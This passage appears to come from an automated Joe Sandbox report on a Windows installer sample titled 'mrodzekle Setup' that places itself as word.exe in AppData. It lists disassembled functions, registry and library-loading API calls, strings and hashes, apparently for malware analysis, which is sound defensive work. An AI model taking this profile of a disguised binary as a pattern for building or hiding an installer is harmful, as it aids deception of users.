                                  • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                  • Instruction ID: b5292072505f589c3e6e61736795eac3e8b5c463abbfbac9e5f2f3c06e421abf
                                  • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                  • Instruction Fuzzy Hash: BE015275D00219BADB00DB94DC45BFEBBBCAB55715F10412BBB10B71C1C7B465418BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402B6E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
                                  • MulDiv.KERNEL32 ref: 00402BB4
                                  • wsprintfA.USER32 ref: 00402BC4
                                  • SetWindowTextA.USER32(?,?), ref: 00402BD4
                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BE6
                                  Strings
                                  • verifying installer: %d%%, xrefs: 00402BBE
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: Text$ItemTimerWindowwsprintf
                                  • String ID: verifying installer: %d%%
                                  • API String ID: 1451636040-82062127
                                  • Opcode ID: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                  • Instruction ID: c6984150c403b35497dc18a40ce28a5dc8b104db4e9527dfc76b44ca96ff41d6
                                  • Opcode Fuzzy Hash: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                  • Instruction Fuzzy Hash: 5D01FF70A44208BBEB209F60DD49EEE3769FB04345F008039FA06A92D1D7B5AA558F99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402A69 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                                  • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                                  • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: Close$DeleteEnumOpen
                                  • String ID:
                                  • API String ID: 1912718029-0
                                  • Opcode ID: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                  • Instruction ID: fd754328231b90d3809392cacc3778cc58b9849b8c5c25df110c081a09ace752
                                  • Opcode Fuzzy Hash: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                  • Instruction Fuzzy Hash: 29116D71A0000AFEDF219F90DE49DAE3B79FB14345B104076FA05A00E0DBB89E51AFA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                  • String ID:
                                  • API String ID: 1849352358-0
                                  • Opcode ID: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                                  • Instruction ID: 6b5de524c76fb4cd20547a313357388a8ed9b6ad8842e2156e420fd608a0a23d
                                  • Opcode Fuzzy Hash: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                                  • Instruction Fuzzy Hash: 75F0EC72A04118AFD701EBA4DE88DAFB77CFB44305B14443AF501F6190C7749D019B79
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404649 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                  • wsprintfA.USER32 ref: 004046EF
                                  • SetDlgItemTextA.USER32(?,00420538), ref: 00404702
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: ItemTextlstrlenwsprintf
                                  • String ID: %u.%u%s%s
                                  • API String ID: 3540041739-3551169577
                                  • Opcode ID: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                                  • Instruction ID: 33c490f36d39f428f4b6feb88c055206d8f5fbd89635bf607d329e374d543c8d
                                  • Opcode Fuzzy Hash: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                                  • Instruction Fuzzy Hash: 5A11D873A0512437EB0065699C41EAF329CDB82335F150637FE26F31D1E9B9DD1145E8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                  • SendMessageA.USER32 ref: 00401C42
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: MessageSend$Timeout
                                  • String ID: !
                                  • API String ID: 1777923405-2657877971
                                  • Opcode ID: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                                  • Instruction ID: 8eb34b9659dedbc099cc11ce9bc18cab6bc834bdcc036981f8d30f042af137bc
                                  • Opcode Fuzzy Hash: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                                  • Instruction Fuzzy Hash: C621A171A44149BEEF02AFF4C94AAEE7B75EF44704F10407EF501BA1D1DAB88A40DB29
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004038B4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetWindowTextA.USER32(00000000,mrodzekle Setup), ref: 0040394C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: TextWindow
                                  • String ID: 1033$C:\Users\user\AppData\Roaming\word.exe$mrodzekle Setup
                                  • API String ID: 530164218-662814931
                                  • Opcode ID: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                                  • Instruction ID: 9405f6c8d043b7fcf606726b90d8bdb5e10644d2b1bbff0bcd5da451eaf68503
                                  • Opcode Fuzzy Hash: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                                  • Instruction Fuzzy Hash: D211CFB1F006119BC7349F15E88093777BDEB89716369817FE801A73E0D67DAE029A98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040568B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405691
                                  • CharPrevA.USER32(?,00000000), ref: 0040569A
                                  • lstrcatA.KERNEL32(?,00409010), ref: 004056AB
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040568B
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: CharPrevlstrcatlstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 2659869361-4017390910
                                  • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                  • Instruction ID: e5ee9c2d52b027f92723a61f0ff242ac356e57f7af316d882355b101730f0027
                                  • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                  • Instruction Fuzzy Hash: 05D0A972606A302AE60227158C09F8B3A2CCF02321B040462F540B6292C2BC7D818BEE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401F84 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FAF
                                    • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                    • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                    • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                    • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                    • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                                    • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                                    • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                                  • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                                  • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 00401FCF
                                  • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                  • String ID:
                                  • API String ID: 2987980305-0
                                  • Opcode ID: 50cd007fc7b77623f8c7ad5bc39ef5e257e3bb497f63aa12232a7c38023ecf07
                                  • Instruction ID: 27648393275eec621602a0353e8cc2bfbc6c1dadd98057bfccdba155e6fc7477
                                  • Opcode Fuzzy Hash: 50cd007fc7b77623f8c7ad5bc39ef5e257e3bb497f63aa12232a7c38023ecf07
                                  • Instruction Fuzzy Hash: 07215732D04215ABDF216FA48F4DAAE7970AF44354F60423FFA11B22E0CBBC4981D65E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402336 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?), ref: 00402374
                                  • lstrlenA.KERNEL32(0040A410,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
                                  • RegSetValueExA.ADVAPI32(?,?,?,?,0040A410,00000000), ref: 004023CD
                                  • RegCloseKey.ADVAPI32(?), ref: 004024B0
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: CloseCreateValuelstrlen
                                  • String ID:
                                  • API String ID: 1356686001-0
                                  • Opcode ID: 9bf654010a188213ed9da3fb996897beb0b6485406045e6761b6e0bfc6b57b1d
                                  • Instruction ID: e6eb4e552242eddf296ff96e6d07a7eb6613d299afeb9756830ee7ce8f9eb162
                                  • Opcode Fuzzy Hash: 9bf654010a188213ed9da3fb996897beb0b6485406045e6761b6e0bfc6b57b1d
                                  • Instruction Fuzzy Hash: 7111A271E00108BFEB10EFA5DE8DEAF7678EB40758F10443AF505B31D0C6B85D419A69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040571F Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                  Download Yara Rule
                                  APIs
                                  • CharNextA.USER32(004054D1), ref: 0040572D
                                  • CharNextA.USER32(00000000), ref: 00405732
                                  • CharNextA.USER32(00000000), ref: 00405741
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: CharNext
                                  • String ID: C:\
                                  • API String ID: 3213498283-3404278061
                                  • Opcode ID: df1f57800bc78783e49fb04f649057cff683ac7abc20f7779ba38a9a2f776efc
                                  • Instruction ID: 9935135ffb9a6864428372be34cefbf1708860cc48cffe50814e8a96023de109
                                  • Opcode Fuzzy Hash: df1f57800bc78783e49fb04f649057cff683ac7abc20f7779ba38a9a2f776efc
                                  • Instruction Fuzzy Hash: 99F0A761904B21D6EB2272744C84B6B579CDB55720F180437E100B71D197BC4C82AF9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401D38 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: CapsCreateDeviceFontIndirect
                                  • String ID:
                                  • API String ID: 3272661963-0
                                  • Opcode ID: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                                  • Instruction ID: 0c2e595a2d755a053b7cc3d6c09569b1e3f8f946256c05fe5e222a6b1ed621d0
                                  • Opcode Fuzzy Hash: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                                  • Instruction Fuzzy Hash: B0F0C870E48280AFE70157705F0ABAB3F64D715305F100876F251BA2E3C7B910088BAE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402BF1 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                  Download Yara Rule
                                  APIs
                                  • DestroyWindow.USER32 ref: 00402C04
                                  • GetTickCount.KERNEL32(00000000,00402DD1,00000001), ref: 00402C22
                                  • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                                  • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                  • String ID:
                                  • API String ID: 2102729457-0
                                  • Opcode ID: 368aa0899d27fe077c31989b75da56c4405109c76bea3f602025cb1c6477c4a6
                                  • Instruction ID: 902fecb1894dce430947e24fe85b059bfb73d5b7bbd16117cdf5d745fa908bfb
                                  • Opcode Fuzzy Hash: 368aa0899d27fe077c31989b75da56c4405109c76bea3f602025cb1c6477c4a6
                                  • Instruction Fuzzy Hash: 37F03030A09321ABC611EF60BE4CA9E7B74F748B417118576F201B11A4CB7858818B9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404DD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • IsWindowVisible.USER32(?), ref: 00404E0A
                                  • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404E78
                                    • Part of subcall function 00403EA0: SendMessageA.USER32 ref: 00403EB2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: Window$CallMessageProcSendVisible
                                  • String ID:
                                  • API String ID: 3748168415-3916222277
                                  • Opcode ID: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                                  • Instruction ID: 907b3508a45335f305929b628defbf7950d0c65962cf50d158fef9db48df65ea
                                  • Opcode Fuzzy Hash: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                                  • Instruction Fuzzy Hash: 3B11BF71600208BFDF21AF61DC4099B3769BF843A5F40803BF604791A2C7BC4991DFA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403556 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                  Download Yara Rule
                                  APIs
                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040352E,00403337,00000020), ref: 00403570
                                  • GlobalFree.KERNEL32(00000000), ref: 00403577
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403568
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: Free$GlobalLibrary
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 1100898210-4017390910
                                  • Opcode ID: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                                  • Instruction ID: e2315670824f3ca0981a6a6bf9743b5050639b1b799e450ff7e3175358b78d1c
                                  • Opcode Fuzzy Hash: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                                  • Instruction Fuzzy Hash: 10E08C329010206BC6215F08FD0479A7A6C6B44B22F11413AE804772B0C7742D424A88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

